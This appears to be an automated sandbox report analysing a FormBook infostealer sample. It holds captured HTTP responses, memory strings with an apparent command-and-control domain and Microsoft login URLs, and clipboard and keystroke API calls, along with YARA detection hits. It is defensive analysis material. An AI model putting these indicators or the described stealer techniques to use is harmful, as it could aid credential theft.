                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 05:26:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 05:27:01 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 05:27:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3703579679.0000000000E8D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3703579679.0000000000E8D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd/37iq/
                Source: takeown.exe, 0000000A.00000002.3704350785.0000000004226000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.0000000002BC6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nan21.ro
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: takeown.exe, 0000000A.00000002.3704350785.000000000486E000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000320E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: takeown.exe, 0000000A.00000002.3704350785.000000000486E000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000320E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: takeown.exe, 0000000A.00000003.1605072602.0000000007E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01004164
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01004164
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01003F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01003F66
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00FF001C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_0101CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0101CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
